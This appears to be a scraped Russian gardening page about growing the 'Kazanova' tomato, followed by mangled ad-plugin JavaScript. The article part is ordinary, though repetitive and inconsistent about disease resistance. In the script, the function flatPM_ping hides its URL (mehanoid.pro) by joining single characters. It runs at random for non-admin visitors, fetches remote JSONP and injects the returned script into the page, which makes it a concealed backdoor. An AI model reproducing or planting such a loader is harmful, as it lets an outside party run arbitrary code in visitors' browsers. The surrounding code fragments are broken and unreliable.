«Родственник» фитофторы — септориоз — также поражает стебли и листья. Узнать септориоз помогают маленькие белые вкрапления на листовой пластине. В целях профилактики появления грибков обрабатывайте помидорные грядки мыльным раствором. Он создает на поверхности листа защитный барьер.

Из насекомых следует опасаться белокрылку, медведку, паутинного клеща и тлю. Вредители поедают либо корни растения, стебли или плоды. Чтобы этого не допустить, еще на этапе посадки обрабатывайте кусты бордоской жидкостью.

Нюансы выращивания в открытом грунте и в теплице

Выращивая Казанову в теплице, лучше перед посадкой обработать марганцовкой не только землю, но и твердые поверхности внутри сооружения. Также следите за режимом поливов. Если лето жаркое и дождливое, сократите их число. Обращайте внимание на внешний вид кустов, при первых признаках болезни незамедлительно примите меры.

Высаживая культуру в открытый грунт, избегайте нахождения рядом с ней грунтовых подземных вод. Также лучше, если овощи будут расти в безветренном месте. Идеальные соседи для томатов – это бобовые, чеснок, лук, зелень. Если лето холодное и дождливое, накройте томаты пленкой. Как только погода нормализуется, пленку уберите.

Сбор и применение урожая

Собирают Казанову по мере созревания. Срывайте томаты аккуратно, без вреда для других плодов и стебля. Сорт хорош тем, что помидоры могут дозревать самостоятельно после снятия.

Период плодоношения длительный, поэтому наслаждаться свежими овощами можно долго.

Применяют томат в кулинарии: готовят супы, гарниры или салаты. В овощах содержится большое количество витаминов и минералов, они незаменимы для правильного и диетического питания.

Также хозяйки используют Казанову в заготовках на зиму. Маринованные и консервированные томаты после обработки не теряют свои полезные свойства.

Преимущества и недостатки сорта

Как у других сортов, у Казановы есть свои преимущества и недостатки. Среди плюсов отмечают:

  • оригинальный внешний вид;
  • прекрасный вкус;
  • возможность выращивания в разных климатических условиях;
  • универсальность в применении;
  • иммунитет к болезням;
  • полезность.

Из недостатков огородники выделяют необходимость в формировании куста и требовательность к составу почвы.

Отзывы фермеров

Однозначного мнения среди огородников по поводу сорта Казанова нет. Одни считают его очень привлекательным и вкусным, другие указывают на некоторые недостатки.

Алена, г. Пенза: «Я большой любитель необычных помидоров. Помимо оригинальной внешности, ценю сорт Казанова за прекрасные вкусовые качества. Делаю из овощей закуски и салаты, а также готовлю томатный сок».

Елена, г. Тюмень: «О сорте Казанова услышала совсем недавно. Посадила его у себя на участке, и оказалось, что это неприхотливый и красивый сорт. Кусты высокие, но аккуратные. Подвязывала к колышкам, проблем это не доставляло. Сорту ставлю твердую «5».

Максим, г. Москва: «Я большой любитель индетерминантных сортов, но Казанова меня не очень впечатлил. Кисти формировались слабо, томаты завязывались медленно. По вкусу они не отличаются от большинства распространенных сортов».

Заключение

Ученые доказали, что томат обладает прекрасным свойством улучшать настроение, потому что содержит серотонин. Поэтому многие овощеводы выращивают на своем огороде самые различные помидоров.

Сорт Казанова неприхотлив в уходе, устойчив к болезням и радует хорошим урожаем.

Тепличный сорт с причудливыми плодами — томат Казанова: отзывы и описание

Томат Казанова – сорт вкусных помидоров с оригинальной формой плодов, которые одинаково хороши и в салатах, и в заготовках. Их можно подавать на стол целыми, чтобы развлечь гостей, а также добавлять в разные овощные блюда.

Высота Место посадки Сроки созревания Цвет плодов Размер плодов Происхождение Форма плода
Высокорослый Теплица Среднеспелые Красные Средний Сорт Перцевидные

Описание и характеристика сорта

Томат Казанова числится в Госреестре России с 2017 года. Он дает кусты индетерминантного типа, которые не останавливаются в росте без прищипывания. Без ограничений высота достигает 2 метров. Сорт довольно теплолюбивый и во всех регионах, кроме южных, требует теплицы.

Созревают плоды в средние сроки – лакомиться урожаем можно с июля. У них вытянутая удлиненная форма, больше всего напоминающая огурец. На конце у плодоножки может присутствовать утолщение. Вес плода достигает 200 г, а длина, как у крупноплодных огурцов – до 20 см. Цвет ярко-красный, кожица гладкая. Мякоть имеет классический помидорный вкус и аромат, она мясистая, без излишней водянистости. Томаты хорошо хранятся и переносят транспортировку.

Преимущества и недостатки

  • необычный и забавный вид плодов;
  • прекрасный вкус;
  • хорошая урожайность;
  • плоды плотные, не растрескиваются и хорошо выносят транспортировку;
  • достаточно большой срок хранения;
  • практически универсальное использование.

Минусы:

  • кусты нуждаются в кропотливом уходе – формировании и подвязке;
  • в открытом грунте растет только на юге;
  • уязвим к некоторым болезням и поражается вредителями.

Урожайность

С 1 кв. м получают до 12 кг томатов.

Посадка

Сорт необходимо выращивать рассадным способом. Перед высадкой готовят семена и материалы:

  1. Отбирают крупные здоровые семена, проверяют их на всхожесть. Для этого кладут в стакан с соленой водой. Качественные зерна утонут, а пустые будут плавать.
  2. Затем семена погружают в слабый раствор марганцовки примерно на час. Потом промывают в сите под проточной водой и обрабатывают стимуляторами. Самые распространенные – препараты Эпин или Циркон. Из народных средств огородники рекомендуют раствор пищевой соды или талую воду (замороженную и растопленную дождевую либо речную воду).
  3. Почву составляют из земли с огорода, перегноя и торфа, для дренажа добавляют песок или перегнившие опилки.
  4. Перед посевом почву замораживают и дают растаять либо проливают горячим раствором марганцовки. Вместо марганцовки можно взять медьсодержащий фунгицид, например, медный купорос. Такая обработка убьет возбудителей болезней и личинки паразитов.
  5. Прежде чем наполнить почвой ящики для рассады, их тоже обеззараживают.

Для рассады делают бороздки в нескольких сантиметрах друг от друга и глубиной около 0,5-1 см. Семена раскладывают по ним, увлажняют и накрывают пленкой. Пока не появятся ростки, держат в теплом месте. Когда посевы взойдут, пленку снимают, а ящики переносят на подоконник. Температуру устанавливают на уровне +18-22.

Ростки поливают по мере необходимости, не давая земле пересыхать или покрываться плесенью от излишней влаги. Появление на кустиках 2 настоящих листьев – признак, что пора пикировать рассаду по индивидуальным горшочкам.

Рассаде требуются подкормки:

  • азотная – на этапе 3 настоящих листьев;
  • комплексное удобрение для рассады – через 2 недели после первой;
  • повторно вносят комплексное удобрение через две недели после второй.

Томаты рассаживают по схеме 40 на 40 или более сантиметров между растениями. В лунки предварительно вносят торф и немного удобрений.

Выращивание и уход

Томаты поливают по утрам под корень. Вода должна быть слегка подогретой. Поливают ежедневно или по мере необходимости.

Кусты подкармливают органическими и минеральными удобрениями. На ранних этапах жизни можно использовать средства с азотом, затем – комплексные препараты с фосфором, калием и другими элементами. Частота подкормок – до 5 раз с интервалом в 2 недели.

Растения формируют и ведут в 1-2 стебля. Нижние листья осторожно срезают, верхушку прищипывают на уровне шпалеры.

Борьба с вредителями и заболеваниями

Против болезней обрабатывают препаратами:

  • от бурой пятнистости – фунгицид «Хом»;
  • от фитофтороза и фузариоза – «Барьер»;
  • от вершинной гнили вносят подкормки с кальцием, например, смесь известняка с медом.

Для защиты от слизней почву пересыпают острым перцем. Медведку устраняют обработками «Громом», паутинного клеща – «Карбофосом».

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};